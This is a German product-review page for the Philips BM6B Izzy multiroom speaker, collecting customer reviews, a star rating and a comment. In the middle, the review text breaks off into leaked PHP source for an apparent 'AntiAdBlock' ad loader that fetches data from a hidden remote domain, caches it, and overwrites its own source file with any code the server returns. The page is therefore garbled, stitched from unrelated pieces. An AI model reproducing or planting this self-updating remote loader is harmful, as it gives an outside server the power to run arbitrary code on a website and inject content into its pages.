Philips BM6B kabelloser Multiroom Lautsprecher : Lautsprecher für den Garten

Ein großartiges multiroom system. Anschluss an hifi anlage mit 3,5 klinke möglich. Bluetooth ist natürlich auch vorhanden. Die boxen koppeln untereinander über ein eigenes wlan und die kopplung funktioniert einwandfrei und easy. Und sie haben akku, können aber auch über netzanschluss betrieben werden. Ich habe eine lautlos als sender an der hifi anlage angeschlossen und eine andere in einem anderem raum. Die klang ist in ordnung und die lautstärke absolut ausreichend.

Kauften wir den lautsprecher im zuge der cashback aktion – wir wickelten alles ab und sendeten die unterlagen rechtzeitig zu philips. Die aktion ist irreführend und betrug am käufer.Lächerlich dass eine marke so etwas nötig hat. Philips produkte kaufe ich keine mehr.

Habe mir nach langer Überlegung und vergleichen mit anderen laufsprecherherstellern den bm5b und bm6b gekauft. Und ich habe den kauf bisher nicht bereut. Bm6b, kabeloser multiroomlautsprecher, hat vor ein paar tagen angefangen zu schrabbeln, werde ihn nun einschicken und hoffe das anschließend wieder ein guter klang zu hören ist. Die koppelung der beiden geräte ist simple, auch das entkoppelt klappt einfach. Ich habe bm5b als hauptlautsrecher eingestellt, manchmal wenn ich ihn anschalte, dann schaltet sich bm6b nicht mit ein. Dann muss ich bm5b nochmal ausschalten, wieder einschalten und dann klappt es. Die angegeben 100m multiroom-reichweite sind etwas hoch angesetzt, aber es reicht um innerhalb der wohnng und im garten direkt vor der wohnung den kabellosen lautsprecher noch zu nutzen. Preis/leistung ist hervorragend.

Ich selber nutze den bm6b und auch andere izzy multiroom systeme. Ich bin vom gesamtpaket der multiroom reihe sehr beindruckt. Die verbindung via wireless die das musikerlebnis zuhause neu gestalten. Egal wohin ich gehe, höre ich den qualitativ hochwertigen soundder bm6b ist der kleinste lautsprecher der izzy multiroom reihe und der einzige mit einem integrierten akku. Auch der bm6b verfügt über die funktionen bluetooth, audio in (aux) und usb. Er ist spritzwasser geschützt und auch die verschiedenen anschlüsse sind abgedeckt. Für die größe des gerätes ist der sound unschlagbar. Draußen wie drinnen völlig ausreichend. Optimal für den strand oder ein picknick geeignet. Bei mir steht das gerät im badezimmer.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();
  • Genau mein Ding!
  • Lautsprecher für den Garten
  • verbindet sich manchmal nicht auf Anhieb – Hintergrund CashBack Aktion

Philips BM6B kabelloser Multiroom Lautsprecher (izzy System, Bluetooth, 8 Std. Akku, Spritzwassergeschützt) schwarz

In der beschreibung stand „wie neu“ und das war absolut zutreffend, nur die originalverpackung hatte ein paar dellen, die izzy box hat keine makel und keine erkennbaren nutzungsspuren. Ich benutze schon zwei weitere izzy boxen (bm5b) und habe diese tragbare version als ergänzung gesucht. Sie lässt sich schnell in die bestehende gruppe integrieren. Sehr guter und satter sound, leichtes handling. Fazit: sowohl das produkt, als auch der verkäufer sind zu empfehlen.

Es ließ sich von anfang an ohne probleme verbinden. Auch das design ist klassisch und schlicht und kann überalll verwendet werden.

Habe keine vergleichsmöglichkeit mit anderen boxen dieser preisklasse, im vergleich mit dem philips bm5 ist die klangqualität so ziemlich gleich oder sogar etwas schlechter, beim abspielen über bluetooth schwächeln übrigens alle izzy produkte ( jedenfalls kein vergleich zu einem bt adapter an einer stereoanlage ), man bekommt also ungefähr ein bm5 mit akku und spritzschutz zum doppelten preis.

Lautsprecher erfüllt voll meine erwartungen. Klang und lautstärke sind völlig ausreichend. Die handhabung ist sehr einfach. Der lautsprecher kann nur empfolen werden um flexibel musik zu hören.

>der izzy bm6b kommt in einer schmalen verpackung. Er ist vergleichsweise groß und schwer im gegensatz zu anderen lautsprechern seiner klasse. >>die verarbeitung ist sehr gut. Das fingergefühl ist sehr angenehm durch die samtartige oberfläche der bedienknöpfe. >>die handhabung ist kinderleicht. Die beleuchtung zeigt an, was gerade aktiviert ist. >die gruppierung geht ganz schnell, auch ohne groß die bedienungsanleitung zu lesen. Sie funktioniert genau gleich, wie bei den anderen geräten seiner serie. >die akkulaufzeit ist grandios und der klang einmalig. Das verhältnis zwischen bass und melodie ist hier optimiert und sehr angenehm in den ohren.

Aufgabe: musik und hörbücher in der ganzen wohnung ohne nachhall hören können. Umsetzung nach langen Überlegen: eine bm6b und zwei bm5b auf 64m²die quelle ist mein pc übertrage per bluetooth die musik auf eine bm5 und die anderen lautsprecher laufen als gruppe mit. Die lautsprecher untereinander machen keinen nachhall und der klang ist bei wort und musik prima. Die bm6 ist im klang satter als die bm5, aber beide sind akzeptabel. Videos kann man am pc nicht mit den boxen zusammen nutzen, da es verzögerungen im ton gibt, aber dafürwollte ich es auch nicht. Der akku in der bm6 macht das system noch flexibler, wenn ich im letzten beschallten raum auch noch weiter hören will nehme ich die box einfach mit. Für mich eine gute losung und ich würde sie wieder kaufen.

Starker sound, rundum gelungenhabe den izzy bm6 im aktionsbundle mit dem chromecast gekauft. Ausgepackt und erstmal per bluetooth gekoppelt, hat sofort geklappt und los gehts. Seine stärken spielt er mit einer glasklaren stimmenwiedergabe aus. Er eignet sich besonders hörbücher, hörspiele oder musik die sehr auf stimme abziehlt. Bässe gibt er natürlich wieder nur fehlt es natürlich auf grund der größe an volumen für tiefe und kraftvolle bässe. Bei basslastiger musik sollte man abstand von dem lautsprecher nehmen, weil er sich mit bässen im hohen lautstärke bereich doch schwer tut. Die akkulaufleistung ist absolut zufriedenstellend und war bei mir geschätzt über 6 stunden. Der usb anschluss, der eigentlich nur für updates gedacht ist, bietet die nicht erwähnte möglichkeit ein handy zu laden. Beim anschluss des chromcasts über den usb anschluss entstehen leichte störgeräusche, da die möglichkeit von philips nicht angeboten wird, kann dies natürlich daran liegen. Das verbinden ist grundsätzlich ein schönes feature, doch die möglichkeit das man 2 bm6erb im klassischen stereo verbund laufen lassen könnte würde den ls richtig interessant machen.

Summary
Review Date
Reviewed Item
Philips BM6B kabelloser Multiroom Lautsprecher (izzy System, Bluetooth, 8 Std. Akku, Spritzwassergeschützt) schwarz
Rating
4,0 of 5 stars, based on 13 reviews

Author: SmartHome

1 thought on “Philips BM6B kabelloser Multiroom Lautsprecher : Lautsprecher für den Garten

  1. Rezension bezieht sich auf : Philips BM6B kabelloser Multiroom Lautsprecher (izzy System, Bluetooth, 8 Std. Akku, Spritzwassergeschützt) schwarz

    Der klang entspricht nicht annähernd dem preis. Es gibt kein bis kaum bass und auch der gesamtklang ist kein bisschen abgerundet, sondern fast ein bisschen blächern. Ich bin sehr enttäuscht und würde diese box für mehr als 30 € nicht behalten. Zu den restlichen eigenschaften kann ich nichts schreiben, da ich den bm6 nach den ersten soundproben wieder verpackt habe und zurück senden werde. Ich habe ihn mit dem bm5 verglichen. Ohne behaupten zu wollen, dass dieser einen guten klang hätte, kann ich zumindest schreiben, dass ich bei diesem einen deutlich besseren (wenn auch nicht wirklich guten) klang wahrgenommen habe. Wer also boxen der izzyserie “braucht” und nicht gleich 230 € für den bm7 ausgeben will, der sollte besser den bm5 wählen, der zudem nur 2/3 den bm6 kostet.
    1. Der klang entspricht nicht annähernd dem preis. Es gibt kein bis kaum bass und auch der gesamtklang ist kein bisschen abgerundet, sondern fast ein bisschen blächern. Ich bin sehr enttäuscht und würde diese box für mehr als 30 € nicht behalten. Zu den restlichen eigenschaften kann ich nichts schreiben, da ich den bm6 nach den ersten soundproben wieder verpackt habe und zurück senden werde. Ich habe ihn mit dem bm5 verglichen. Ohne behaupten zu wollen, dass dieser einen guten klang hätte, kann ich zumindest schreiben, dass ich bei diesem einen deutlich besseren (wenn auch nicht wirklich guten) klang wahrgenommen habe. Wer also boxen der izzyserie “braucht” und nicht gleich 230 € für den bm7 ausgeben will, der sollte besser den bm5 wählen, der zudem nur 2/3 den bm6 kostet.

Comments are closed.